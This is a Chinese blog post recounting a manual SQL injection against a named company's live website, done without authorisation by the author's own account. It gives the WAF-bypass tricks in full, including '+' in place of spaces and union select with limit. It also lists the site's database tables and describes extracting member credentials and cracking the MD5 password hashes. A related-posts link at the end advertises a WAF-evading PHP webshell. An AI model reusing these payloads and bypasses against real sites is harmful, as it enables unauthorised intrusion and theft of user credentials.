SQL注入实战 绕WTS-WAF

最新推荐文章于 2024-04-13 12:17:49 发布
最新推荐文章于 2024-04-13 12:17:49 发布
阅读量6.7k 收藏 19
点赞数 8
文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37969404/article/details/119897835
版权

SQL注入的一次实战,手动注入绕过WAF完成注入

目标网站是江苏某公司 未拿到授权,以练习为主 点到为止!绝不做违法的事情 该漏洞已提交至补天漏洞安全响应平台

免责声明

本文章仅供学习和参考。因用于其他用途而产生不良后果,作者不承担任何法律责任。

寻找漏洞点

该公司前台页面结构如下:
在这里插入图片描述
尝试手动注入 测试id=6 and 1=1 被后台WAF拦截在这里插入图片描述
将空格替换为+,即id=6+and+1=1 不再拦截,返回正常页面,再将id改为id=6+and+1=2,返回为空 网站存在注入点在这里添加描述

确定字段数目

通过order by 确定字段数目,经过二分法不断测试 ,查询的字段数为1字段数目为1

查询数据库

查询当前所有数据库名称,被WAF拦截在这里插入图片描述
分别将 URL 中的 group_concat()、from、information_schema、schemata 字符依次删除并发送请求.
最后确定是group_concat() 命中了waf规则,并且是 group_concat 和括号 () 在一起的时候才会触发拦截。

将 group_concat() 替换为 group_concat//(),仍然被拦截在这里插入图片描述
不确定是黑名单匹配还是只要包含//这类注释就用正则匹配全部拦截,测试一下,打开burpsuite,使用intrude模块在 /**/ 中间加入随机任意字符串例如 /asd13/ 等,发现确实有些返回包不是 waf 拦截,但是返回状态码403且有如下提示,同样无法正常展示注入的数据,此路行不通在这里插入图片描述
尝试内敛注释 /!group_concat()/ 也被拦截在这里插入图片描述
拼接字符串相关的 concat()函数、concat_ws()函数都被拦截。

好吧,那就不直接获取全部返回值了,老老实实加上 limit 一个一个来吧
经测试,这个网站的数据库就这一个。
在这里插入图片描述
好极了,没有被WAF拦截 返回了当前的数据库 成功绕过!!

读取数据库数据

读取数据库中的表
url?id=-6+union+select+table_name+from+information_schema.tables+where+table_schema=0x73616e79696e67+limit+0,1–+
在=后面是该数据库的名字的16进制编码。
在这里插入图片描述经过测试 当前数据库表共有17个 分别是
db_down 0x64625f646f776e20
db_field 0x64625f6669656c64
db_files 0x64625f66696c6573
db_index_images 0x64625f696e6465785f696d61676573
db_jobs 0x64625f6a6f6273
db_manage 0x64625f6d616e616765
db_member 0x64625f6d656d626572
db_menu 0x64625f6d656e75
db_message 0x64625f6d657373616765
db_my_ads 0x64625f6d795f616473
db_my_links 0x64625f6d795f6c696e6b73
db_news 0x64625f6e657773
db_products 0x64625f70726f6475637473
db_record 0x64625f7265636f7264
db_reservation 0x64625f7265736572766174696f6e
db_singlepage 0x64625f73696e676c6570616765
db_web_class 0x64625f7765625f636c617373

选取member表查看一下注册的用户名和对应的密码,密码经过了md5加密 去在线解密网站解密一下即可。在这里插入图片描述
在这里插入图片描述

到此为止,整个渗透过程全部结束 感觉现在的厂家防护能力做的都是表面工作啊。没有对用户的输入信息进行完全过滤。

Litt1eZz
关注
  • 8
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
NL2SQL进阶系列(2):DAIL-SQL、DB-GPT开源应用实践详解[Text2SQL]
丨汀、的博客
04-12 519
NL2SQL进阶系列(2):DAIL-SQL、DB-GPT开源应用实践详解[Text2SQL]
macplus-WTS-master.zip
03-16
蘑菇街teamtalk即时通信的源码。蘑菇街先前在Github上开源的代码,由于侵权网易popo而被关闭,但开源的精神是很好的。
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀的PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
WAF的识别、检测、过原理与实战案例
2301_81250923的博客
11-30 1059
WAF通过配置DNS解析地址、软件部署、串联部署、透明部署、网桥部署、反向代理部署、旁路部署等获取攻击流量,基于规则进行攻击特征匹配,或利用其他方式进行攻击检测及阻断。
小迪WEB
热门推荐
weixin_52125240的博客
09-26 2万+
WEB-学习小迪安全第01天:基础入门—概念名词域名 小迪安全 第01天:基础入门—概念名词 域名 1)什么是域名? 域名,是由一串用点分割的名字组成的Internet上某一台计算机或计算机组的名称,用于在数据传输时计算机的电子方位; 例如:www.bilibili.com 2)域名在哪里注册? 在第三方平台上注册,国内的一些域名注册商,比如阿里云旗下的万网。 3)什么是二级域名多级域名? 二级域名:顶级域名之下的域名。 例如: www.baidu.com为主域,则图中news.baidu.com为二级域
waf入门到bypass
focus on security
08-09 964
Web应用程序防火墙是位于Web应用程序与客户端端点之间的安全策略实施点。该功能可以用软件或硬件,在设备设备中运行或在运行通用操作系统的典型服务器中实现。它可以是独立设备,也可以集成到其他网络组件中。 对于WAF,你了解多少?需要这篇文章能对你有所帮助! 0X00 介绍 WAF如何工作: 使用一组规则来区分正常请求和恶意请求。 学习模式通过了解用户行为自动添加规则 。 WAF如何防御: 负面模型(基于黑名单)-黑名单模型使用预设的签名来阻止显然是恶意的Web流量,并使用签名来防止利用某些网站和.
实战WTS-WAFSQL注入
剁椒鱼头没剁椒的博客
02-12 3937
本人在做完测试了,所保留的信息均已删除且未保留,只是友好的测试,并非有意为之。若侵权请联系我进行删帖。其实这个网站主要的困难就是需要WAF,通常想这类的WAF在百度搜一搜都会有相关的过方式的。
waf过方法总结
gugonggugong的博客
12-30 2734
一、WAF防护原理 1. bypass 客户端JavaScript校验;服务器校验;文件内容头字段、编码校验;后缀名黑名单校验;自定义正则校验;waf设备校验; 有些waf不会防asp/php/jsp后缀文件,但是他会检测里面的文件; WTS-WAF bypass ; baidu colud bypass; aliyun waf; 安全狗上传bypass;云锁上传bypass; 2. defense ...
实战SQL注入WTS-WAF
m0_51750962的博客
10-01 267
SQL注入wts-waf
织梦cms仿站_文章发布出现WTS-WAF页面
weixin_56803901的博客
08-14 258
小编在发文章的时候遇见了一个特殊情况如下: WTS-WAF页面实列图片: 页面出现: WTS-WAF拦截详情 1.你的请求是黑客攻击 2.你的请求合法但触发了安全规则,请提交问题反馈 针对以上的情况,是发布页面的代码有关于PHP的代码编写插入,有这种情况的时候,小编建议:检查或者删除文章内PHP代码 ...
bypass-wts-waf
xyzBlog
08-11 1277
今天遇到个站有点意思,环境asp.net,wafwtswaf,有个链接存在sql注入waf注入的整个过程非常顺利,以下是过程 ?id=6532+and+1=1 //用+号是为了waf ?id=6532+and+1=2 网页出现异常说明存在注入。 然后ORDER BY 25 查询字段,超过25出现异常说明字段数为25 +union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+admin
WTS-master.zip
12-28
WTS-master
wts-开源
07-16
Wi-ty Services 是一个轻松发布有状态服务的平台。
new_x-WTS-32.exe
12-13
new_x-WTS-32.exe
WTS-DY0523B隔离电源模块
07-28
主要用途:共享电动自行车换电柜主板,共享充电宝主板,汽车充电桩主板,RF美容仪主板,理疗仪主板,洗衣机主板,空调主板等AC供电设备场合。
MySQL中的SQL高级语句[二]
a15766649633的博客
04-12 902
SQL高级语句[二]上线了噢,虽迟但到好吧,这篇逻辑需要一点,感兴趣的可看,本来打算上下篇,但是既然我晚发了,所以就直接上下一起了吧~
关于使用druid数据源连接Oracle导致的SQLRecoverableException(socket read timeout,关闭的连接等)
最新发布
男神的专栏
04-13 251
查看出错日志检查问题的时候,不能只看抛出错误最近的那几行代码,一定要看过整体的方法栈,知道运行的流程,再仔细看抛出异常的代码,看看该行代码执行的前后逻辑。
MyBatis 中的动态 SQL 的相关使用方法
m0_74101983的博客
04-12 1024
为什么会有动态SQL,把SQL写死不是比较方便吗?其实有很多的举例,这里我那一个常见的来说,像我们用户注册,会有必填字段和非必填字段,有些传来的参数不一样,那对应的SQL也不一样,因此,在这些的场景底下我们需要使用动态SQL来完成。这里动态SQL我是使用XML的办法进行说明,因为使用注解不方便,而且不好观察哪里有误。这里我会先从一些常用的标签的介绍来对动态SQL进行使用的讲解。
MySQLsql性能分析
qq_62636650的博客
04-12 987
MySQL客户端连接成功后,通过show[session|global]status命令可以提供服务器状态信息。通过如下指令,可以查看当前数据库的所有INSERT、DELETE、UPDATE、SELECT的访问频次。
watermark for wts as wts-interval '5' second 什么意思
07-14
`watermark for wts as wts-interval '5' second` 是一个Flink SQL的语句片段,用于定义一个基于事件时间的水位线生成规则。 在该语句中,`wts` 是一个事件时间字段,`wts-interval '5' second` 表示水位线生成规则,指示系统根据事件时间字段 `wts` 的数值减去 5 秒来生成水位线。 具体来说,该水位线生成规则会根据事件时间字段 `wts` 的数值减去 5 秒,将结果作为水位线。这意味着,当事件时间字段 `wts` 的数值超过当前时间减去 5 秒时,该事件时间被认为是过去的事件,相应的窗口操作可以被触发。 通过在Flink SQL的查询中使用水位线生成规则,可以指导系统在处理基于事件时间的操作时正确地确定事件时间的进度,并控制窗口操作的触发时机。这对于处理延迟数据和乱序数据非常重要。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值